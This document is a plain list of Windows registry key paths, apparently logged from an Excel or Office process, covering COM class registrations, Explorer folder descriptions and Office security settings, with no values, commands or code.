HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Common Start Menu
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\StreamResource
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\StreamResourceType
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Roamable
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\PreCreate
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Stream
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\DefinitionFlags
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\Roamable
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\PreCreate
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\PublishExpandedPath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\DefinitionFlags
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\Attributes
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\Category
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\Name
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\ParentFolder
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\Description
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\RelativePath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\InfoTip
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\LocalizedName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\Icon
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\InitFolderHandler
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.FileTypeAssociation
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.FileTypeAssociation
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.FileTypeAssociation\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.FileTypeAssociation\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.FileTypeAssociation\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.FileTypeAssociation\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.FileTypeAssociation\TrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.FileTypeAssociation\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.FileTypeAssociation\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.FileTypeAssociation\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.FileTypeAssociation\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.FileTypeAssociation\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.FileTypeAssociation\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.FileTypeAssociation\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.FileTypeAssociation\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\Server\StateRepository
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\Server\StateRepository
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\Server\StateRepository\ExePath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\Server\StateRepository\CommandLine
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\Server\StateRepository\IdentityType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\Server\StateRepository\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\Server\StateRepository\ActivatableClasses
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\Server\StateRepository\ServerType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{8645456F-D9A2-4B82-AFEC-58F0E8DF0ACF}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{8645456F-D9A2-4B82-AFEC-58F0E8DF0ACF}\ProxyStubClsid32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\Interface\{8645456F-D9A2-4B82-AFEC-58F0E8DF0ACF}\ProxyStubClsid32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}\(Default)
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}\InprocHandler32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}\InprocServer32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}\LocalServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{89BC3F49-F8D9-5103-BA13-DE497E609167}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{89BC3F49-F8D9-5103-BA13-DE497E609167}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\PropertySystem\PropertyHandlers\.xls
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\PropertySystem\PropertyHandlers\.xls
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{97E467B4-98C6-4F19-9588-161B7773D6F6}\OverrideFileSystemProperties
HKEY_CURRENT_USER\Software\Classes\CLSID\{97E467B4-98C6-4F19-9588-161B7773D6F6}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{97E467B4-98C6-4F19-9588-161B7773D6F6}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{97E467B4-98C6-4F19-9588-161B7773D6F6}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{97E467B4-98C6-4F19-9588-161B7773D6F6}
HKEY_CURRENT_USER\Software\Classes\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\InprocServer32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\InprocServer32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\InprocHandler32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\LocalServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\SyncRootManager
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\SyncRootManager
HKEY_CURRENT_USER\Software\Classes\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\TreatAs
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\InprocServer32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\InprocHandler32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\LocalServer32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\LocalServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\LocalServer
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\Elevation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\Elevation
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Outlook\Security
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\DisableROForSharedDocs
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\SupportUNCMappedDriveSaveAs
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Excel\Security\FileBlock
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\FileBlock
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Excel\Security\FileValidation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\FileValidation
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ActiveX Cache
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Security\ProtectedView\Locations
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Security\ProtectedView\Locations
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Excel\Security\ProtectedView
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems\idp
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery\23F386A
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery\23F386A\23F386A
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Offline\Options\CheckoutToDraftsEnabled
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\Common\Offline\Options
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Excel\Text Converters\OOXML Converters\Import
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Excel\Text Converters\OOXML Converters\Export
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\InprocHandler32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\OLE\Tracing
HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\Tracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Ole
HKEY_LOCAL_MACHINE\Software\Microsoft\Ole
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\EnableLogUnsupportedFeaturesToAppStorage
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\RevisionTrimSettings
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DefaultSheetR2L
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\A4Letter
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\CursorVisual
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\ControlCharacters
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DefaultFormat
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\VbaOff
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\VbaOff
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Office\16.0\Common\OfficeUpdate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutomaticPictureCompressionDefault
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DiscardImageEdits
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DefaultImageDPI
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\QFE_Saskatchewan
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\QFE_Honshu
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Excel\Security\Trusted Locations
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations\AllLocationsDisabled
HKEY_CURRENT_USER\Software\Policies\Policies\Microsoft\Office\16.0\Common\Security\Trusted Locations
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Security\Trusted Locations
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations\BlockFQDNFileProtocol
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Security\FileValidation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Security\FileValidation\EnableLogging
HKEY_CURRENT_USER\Software\Classes\Interface\{1B0D3570-0877-5EC2-8A2C-3B9539506ACA}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{11659A23-5884-4D1B-9CF6-67D6F4F90B36}\TreatAs
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{11659A23-5884-4D1B-9CF6-67D6F4F90B36}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{11659A23-5884-4D1B-9CF6-67D6F4F90B36}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{11659A23-5884-4D1B-9CF6-67D6F4F90B36}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{11659A23-5884-4D1B-9CF6-67D6F4F90B36}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{11659A23-5884-4D1B-9CF6-67D6F4F90B36}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{11659A23-5884-4D1B-9CF6-67D6F4F90B36}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{11659A23-5884-4D1B-9CF6-67D6F4F90B36}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{11659A23-5884-4D1B-9CF6-67D6F4F90B36}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{5DB5FA32-707C-5849-A06B-91C8EB9D10E8}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountInternal
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\ExtensionHardening
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Excel\Security\FileBlock\Override
HKEY_CURRENT_USER\Software\Classes\Interface\{00000160-0000-0000-C000-000000000046}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\Interface\{00000160-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{00000160-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{00000160-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_CURRENT_USER\Software\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InprocServer32
